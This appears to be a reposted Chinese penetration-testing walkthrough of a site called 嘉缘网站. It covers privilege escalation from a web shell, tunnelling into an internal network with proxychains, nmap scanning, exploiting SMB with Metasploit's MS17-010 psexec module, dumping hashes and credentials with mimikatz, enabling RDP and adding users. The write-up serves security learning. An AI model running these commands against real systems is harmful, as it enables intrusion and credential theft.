【提权过程】嘉缘网站--提权,代理,内网渗透(针对445端口)

news/2024/5/10 3:13:56/文章来源:https://blog.csdn.net/weixin_34199335/article/details/94457466
这篇是由上篇 【渗透过程】嘉缘网站--测试
https://www.cnblogs.com/G-Shadow/articles/10964374.html
之后的操作,文章包括了提权,HTTP代理及对内网的渗透

使用蚁剑连接上写入的一句话后,使用虚拟终端发现自己权限为最高权限可以执行任何操作

 

这里讲一下提权,假如权限不高,需要进行提权

首先:查看服务器的操作系统

如果这里为win2003,可以找台2003的机器把cmd.exe程序上传到目标服务器

跳到该目录下执行cmd 你会发现权限权限有所提升,可以执行一下基础命令,但是还是无法执行新建用户,开启3389端口等命令

这时我们只需上传提权工具如pr 巴西烤肉等

使用提取权工具进行命令的执行,这样我们就达到提权的目的了

 

 接着上篇,当我们使用蚁剑进行执行Dos命令发现目标服务器存在2块网卡

(这里蚁剑如果无法执行命令,可以上传一个大马)

 

而且发现在238段下还有内网服务器

arp -a

需要进行挂代理,只有这样才能对内网服务器进行测试

 

代理设置:

(因为要对内网进行其他操作,所有这里只介绍如何给kali进行代理设置)

首先安装:

 

安装插件

安装完成后

这里需要通过菜刀或蚁剑上传所需的文件(网站为php站这里上传tunnel.php)

上传成功后进行监听 ,监听的终端不能关需要一直开启

再次开启一个终端  修改配置文件

把dynamic_chain前的#删掉

同时在最下方加入  socks5 127.0.0.1 9632(这里的9632为你上方监听的端口)之后退出保存

通过打开的网页访问内网IP 192.168.238.128  这时进行监听的终端开始跑了并成功显示探针 说明代理设置成功

如果监听的终端没有变化,网页也没显示,需要进行以下操作,之后再次从终端打开浏览器

 

如果还不成功,请关机,从新启动一下kali (修改的配置没有运行成功,需要重启)

添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0route add -net 192.168.90.0/24 gw 192.168.90.1删除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0

  

内网渗透

针对445端口

代理成功后,每此执行命令或使用软件时 在命令前加上 proxychains

之后使用nmap开始对 192.168.238.129   129.168.238.130 进行端口扫描

proxychains nmap -vvv -n -sT -PN 192.168.238.129
proxychains nmap -vvv -n -sT -PN 192.168.238.130

发现2个都开135 139 445端口  这里只对445进行   

192.168.238.129

 

192.168.238.130

 

对192.168.238.129:445

 使用kali的工具   

proxychains msfconsole   //启动MSF终端

 

使用攻击模块

search   option  //搜索相关工具和攻击载荷
use  use exploit/windows/smb/ms17_010_psexec  //启动该模块
show options    //查看相关信息

set RHOST  目标IP
set LHOST 本机IP
set threads 端口
exploit //执行 或者用run

执行成功后会返回meterpreter  当执行命令有可能不会回显,因为有代理有可能返回的包会丢失 但是命令会执行

我们尝试直接利用 getuid 和 getsystem 命令来提权

使用命令获取hash值

run post/windows/gather/smart_hashdump

通过撞库得到administrator的密码  

使用得到密码和账户使用kaili的远程桌面进行连接

proxychains  rdesktop IP  //远程连接 目标机需要开启3389端口

 

run post/windows/manage/enable_rdp    //开启3389

run getgui -u xxxxx -p xxxxx //添加用户

download c:\\1.txt //下载文件

upload ll.txt c:\ //上传文件

cat 11.txt //查看文件

pwd //查询当前路径

sysinfo //显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息

   介绍个神器 mimikatz :

   load mimikatz

   msv (获取 hash 值)

   ssp (获取明文信息)

   wdigest (获取系统账户信息)

   mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)

   mimikatz_command -f hash:: (获取目标 hash)

 

如果直接使用开启3389端口命令无法执行的话,可以在本地生产一个木马文件通过上传一个木马文件

创建会话反弹会一个shell

从新开启一个终端

 同时使用另一个终端上传生成的exe程序 并执行

 

转载于:https://www.cnblogs.com/G-Shadow/p/10965035.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_747372.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

大型网站技术架构(五)网站高可用架构

2019独角兽企业重金招聘Python工程师标准>>> 网站的可用性(Avaliability)描述网站可有效访问的特性。 1、网站可用性的度量与考核 网站不可用时间(故障时间)故障修复时间点-故障发现(报告)时间点…

大型网站技术架构(四)网站的高性能架构

2019独角兽企业重金招聘Python工程师标准>>> 网站性能是客观的指标,可以具体体现到响应时间、吞吐量、并发数、性能计数器等技术指标。 1、性能测试指标 1.1 响应时间 指应用执行一个操作需要的时间,指从发出请求到最后收到响应数据所需要的时…

大型网站技术架构(八)网站的安全架构

2019独角兽企业重金招聘Python工程师标准>>> 从互联网诞生起,安全威胁就一直伴随着网站的发展,各种Web攻击和信息泄露也从未停止。常见的攻击手段有XSS攻击、SQL注入、CSRF、Session劫持等。 1、XSS攻击 XSS攻击即跨站点脚本攻击(…

实现手机访问,自动跳转网站手机版

百度Site App的uaredirect.js实现手机访问&#xff0c;自动跳转网站手机版 以下为代码&#xff0c;可放置在网站foot底部文件&#xff0c;或者haead顶部文件&#xff0c;建议将代码放在网站顶部&#xff0c;这样可以实现手机访问立即跳转&#xff01; <script src"http…

通过webDAV来管理网站上的资源

WebDAV&#xff08;Web Distributed Authoring and Versioning&#xff09;扩展了HTTP.1.1通信协议的功能&#xff0c;他让具备适当权限的用户&#xff0c;可以直接通过浏览器、网上邻居来管理远程的webDAV文件夹内的文件&#xff0c;我们下面就来讲一下webDAV是实现。一、启用…

猫咪单独为某个网站添加Proxy

猫咪将overleaf网站添加到猫咪名单中&#xff0c;猫咪单独为某个网站添加猫咪 坑。暂时没有找到解决方案。 我想实现的效果是&#xff0c;打开一个网站&#xff0c;如果网站比较卡&#xff0c;就把这个网站添加到直联列表中。停止对它的猫咪。 方案1&#xff1a; 1、修改猫…

如何禁止自己的电脑访问某个网站?

如何禁止自己的电脑访问某个网站&#xff1f;BlockSite 方案1&#xff1a; https://blog.csdn.net/main_double/article/details/105613165 https://zh.wikihow.com/%E5%9C%A8%E7%94%B5%E8%84%91%E4%B8%8A%E5%B1%8F%E8%94%BD%E7%BD%91%E7%AB%99 操作了一大堆都是没用的&…

电商网站设计系列——促销码功能设计与思考

2019独角兽企业重金招聘Python工程师标准>>> 本文作者将会从三个方面讲述&#xff1a;如何设计电商网站的促销码功能呢&#xff1f;在设计过程中我们需要注意些什么呢&#xff1f; 国外电商网站中有一个东西叫做“促销码”&#xff0c;相当于国内电商的“优惠券”。…

大型网站架构系列:电商网站架构案例(3)

本文章是电商网站架构案例的第三篇&#xff0c;主要介绍数据库集群&#xff0c;读写分离&#xff0c;分库分表&#xff0c;服务化&#xff0c;消息队列的使用&#xff0c;以及本电商案例的架构总结。 6.5数据库集群&#xff08;读写分离&#xff0c;分库分表&#xff09; 大型网…

打开小猫咪之后,国内的网站打不开了,怎么办。原因是dns解析出了问题

打开小猫咪之后&#xff0c;国内的网站打不开了&#xff0c;怎么办。原因是dns解析出了问题 关闭远程dns解析功能即可&#xff0c;之前回答过该问题&#xff01; https://blog.csdn.net/Hodors/article/details/126922545?ops_request_misc%257B%2522request%255Fid%2522%25…

为什么开了小猫咪之后,国内的网站就登录不上去了

为什么开了小猫咪之后&#xff0c;国内的网站就登录不上去了 现象描述&#xff1a; 1、打开小猫咪&#xff0c;能够gole&#xff1b; 2、但是访问csdn时&#xff0c;巨卡&#xff1b;DNS解析错误&#xff1b; 3、关闭小猫咪&#xff0c;不能gole&#xff0c;但是能访问csdn…

2014年我国钓鱼网站数量已超9.3万个

中国互联网协会、国家互联网应急中心(CNCERT)20日在京发布的《中国互联网站发展状况及其安全报告(2015)》显示&#xff0c;2014年&#xff0c;我国发现恶意仿冒钓鱼网站页面数量增至93136个&#xff0c;较2013年增长2.1倍。 据国家互联网应急中心高级工程师何世平介绍&#xff…

分享一个在线的简历制作网站:Reactive-Resume

分享一个在线的简历制作网站&#xff1a;Reactive-Resume rxresu.me 这个网站最厉害的地方是&#xff1a; Free, foreverNo AdvertisingNo User TrackingAccessible in multiple languagesImport data from LinkedIn, JSON ResumeExport your resume to JSON or PDF formatA…

java 企业网站源码模版 有前后台 springmvc SSM 生成静态化

java 企业网站源码 前后台都有 静态模版引擎&#xff0c; 代码生成器大大提高开发效率点击&#xff1a;获取地址QQ 313596790系统介绍&#xff1a;1.网站后台采用主流的 SSM 框架 jsp JSTL&#xff0c;网站后台采用freemaker静态化模版引擎生成html2.因为是生成的html&#xff…

12个网站帮助你学习 Flash / ActionScript

Adobe Flash是一个很好的技术&#xff0c;该技术允许开发人员加入的互动性和平稳的动画网页。 其受欢迎程度是如此巨大&#xff0c;您可以看到许多网站&#xff0c;致力于帮助开发者有兴趣在闪光。 在这篇文章中&#xff0c; 您可以找到12个精彩的网站&#xff0c;值得一提的书…

免费下载无版权高清大图,我推荐这几个网站

前几天有同学问我&#xff0c;有没有下载高清无版权大图的网站。 作为各种素材都有的我来说&#xff0c;回答当然是&#xff1a;有&#xff01;其实这类的网站还是很多的&#xff0c;大部分以国外的网站为主&#xff0c;而且图片的质量都是非常高。这里我整理总结了几个网站跟大…

博客网站容器化

文章目录欢迎关注公众号原本的VPS是Centos 6的&#xff0c;系统比较老&#xff0c;而且不原生的支持docker。最近疫情肆虐&#xff0c;在家闲着也是闲着&#xff0c;着手把系统升级到7,顺手也把网站的部署容器化。备份 关于如何备份&#xff0c;查到的资料中&#xff0c;有的说…

知道这5个隐藏资源网站的人非常少,难怪总是找不到资源!

现在的互联网是开放的&#xff0c;我们可以通过网络下载到很多自己需要的东西&#xff0c;但是有些网站因为不够知名而被忽视&#xff0c;但是里面的资源还是很不错的。 今天小编就来跟大家分享几个隐藏的资源网站&#xff1a; Aio search国外的一个BT资源站&#xff0c;资源非…

快速找出网站中可能存在的XSS漏洞实践(一)

一、背景 笔者最近在慕课录制了一套XSS跨站漏洞 加强Web安全视频教程&#xff0c;课程当中有讲到XSS的挖掘方式&#xff0c;所以在录制课程之前需要做大量实践案例&#xff0c;最近视频已经录制完成&#xff0c;准备将这些XSS漏洞的挖掘过程记录下来&#xff0c;方便自己也方便…

干货满满:小团队(网站和APP)没有数据方面的预算,推广运营人员如何用数据提升业务?...

先说结论&#xff1a;没有钱&#xff0c;没有预算照样可以做好数字运营&#xff0c;数字营销。想解决这个棘手的问题&#xff0c;要么花钱&#xff0c;要么花时间咯。下文中会具体讲花时间&#xff08;精力&#xff09;的方法。 1.先从付费类的软件说起&#xff1a; 截止2018年…